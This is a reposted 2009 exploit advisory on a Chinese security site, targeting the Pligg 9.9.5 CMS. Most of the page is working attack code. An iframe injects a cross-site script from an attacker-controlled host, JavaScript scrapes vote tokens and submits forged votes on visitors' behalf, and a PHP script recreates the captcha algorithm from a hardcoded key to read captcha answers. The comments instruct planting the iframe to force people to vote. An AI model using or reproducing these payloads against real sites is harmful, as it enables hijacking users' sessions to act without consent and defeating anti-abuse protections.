首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
Written By Michael Brooks
Special thanks to str0ke!

Pligg - XSRF Protection Bypass and Captcha Bypass
affects 9.9.5

XSRF Protection Bypass
<html>
<!--
Remove this iframe from this file and place it on a site that you want
to force people to vote for.
Change these pligg_story_to_vote_for, target_pligg_site and site_you_control .
-->
<iframe src='http://target_pligg_site/index.php?category="><script
src=http://site_you_control/pligg_auto_voter.html
type=text/javascript></script>' width="0%" height="0%"></iframe>
</html>

	var pligg_story_to_vote_for="/story.php?title=pligg_xss";
	
	function r(){
		var Z=false;
		if(window.XMLHttpRequest){
			try{
				Z=new XMLHttpRequest()
			}catch(e){Z=false}
		}else if(window.ActiveXObject){
			try{
				Z=new ActiveXObject('Msxml2.XMLHTTP')
			}catch(e){
				try{
					Z=new ActiveXObject('Microsoft.XMLHTTP')
				}catch(e){Z=false}
			}
		}
		return Z
	}
	var x=r();
	x.open("GET",pligg_story_to_vote_for,true);
	x.onreadystatechange = function() {
		if (x.readyState == 4) {
			var v=x.responseText.split("javascript:vote(");
			v=v[1].split(")");
			v=v[0].split(",");
			var p="id="+v[1]+"&user="+v[0]+"&md5="+v[3].substring(1,33)+"&value="+v[4];
			var y=r();
			y.open("POST","/vote.php",true);
			y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
			y.setRequestHeader("Content-length", p.length);
			y.setRequestHeader("Connection", "close");
			y.send(p);
		}
	}
	x.send('');

Captcha bypass.
The link to the capthca image will look something like this:

http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854

To obtain the clear text, send that ts_random value to the
captcha_bypass.php with the same web browser:


http://127.0.0.1/captcha_bypass.php?ts_random=54771854

captcha_bypass.php:

<?php

$sitekey=82397834;

$ts_random=$_REQUEST['ts_random'];

$datekey = date("F j");

$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey .
$ts_random . $datekey));

print substr($rcode, 2, 6);

?>

# [2009-01-29]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zoom VoIP Phone Adapater ATA1+
·Total Video Player 1.3.7 (.m3u
·D-Link VoIP Phone Adapter XSS/
·SalesCart (Auth Bypass) SQL In
·Profense Web Application Firew
·ReVou Twitter Clone (XSS/SQL)
·ManageEngine Firewall Analyzer
·Amaya Web Editor 11 Remote SEH
·PLE CMS 1.0 beta 4.2 (login.ph
·GNUBoard 4.31.04 (09.01.30) Mu
·NetArtMedia Car Portal 1.0 (Au
·Synactis All_IN_THE_BOX Active
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved